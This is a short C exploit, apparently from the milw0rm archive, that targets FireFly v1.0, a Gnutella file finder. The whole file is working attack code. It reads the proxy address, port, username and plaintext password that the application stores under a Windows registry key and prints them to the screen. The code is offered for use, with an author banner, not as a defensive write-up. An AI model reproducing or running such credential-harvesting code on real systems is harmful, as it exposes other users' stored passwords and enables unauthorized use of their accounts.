/***************************************************************** FireFly v1.0 Local Exploit by Kozan Application: FireFly v1.0 Vendor: NetCruiser Software - www.netcruiser-software.com Vulnerable Description: FireFly v1.0 discloses proxy passwords to local users. Discovered & Coded by: Kozan Credits to ATmaCA Web : www.netmagister.com Web2: www.spyinstructors.com Mail: kozan@netmagister.com *****************************************************************/ #include #include #define BUFSIZE 100 HKEY hKey; char proxyaddr[BUFSIZE], proxyport[BUFSIZE], proxyuser[BUFSIZE], proxypass[BUFSIZE]; DWORD dwBufLen=BUFSIZE; LONG lRet; int main(void) { if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\FireFly FileFinder\\GnutellaServer", 0, KEY_QUERY_VALUE, &hKey) == ERROR_SUCCESS) { lRet = RegQueryValueEx( hKey, "ProxyAddr", NULL, NULL,(LPBYTE) proxyaddr,&dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){ strcpy(proxyaddr,"Not found!"); } lRet = RegQueryValueEx( hKey, "ProxyPass", NULL, NULL,(LPBYTE) proxypass, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){ strcpy(proxypass,"Not found!"); } lRet = RegQueryValueEx( hKey, "ProxyUser", NULL, NULL,(LPBYTE) proxyuser, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){ strcpy(proxyuser,"Not found!"); } lRet = RegQueryValueEx( hKey, "ProxyPort", NULL, NULL,(LPBYTE) proxyport, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){ strcpy(proxyport,"Not found!"); } RegCloseKey( hKey ); printf("FireFly v1.0 Local Exploit by Kozan\n"); printf("Credits to ATmaCA\n"); printf("www.netmagister.com - www.spyinstructors.com\n"); printf("kozan@netmagister.com\n\n"); printf("Proxy Address : %s\n",proxyaddr); printf("Proxy Port : %s\n",proxyport); printf("Proxy Username : %s\n",proxyuser); printf("Proxy Password : %s\n",proxypass); } else{ printf("FireFly v1.0 is not installed on your system!\n"); } return 0; } // milw0rm.com [2005-04-07]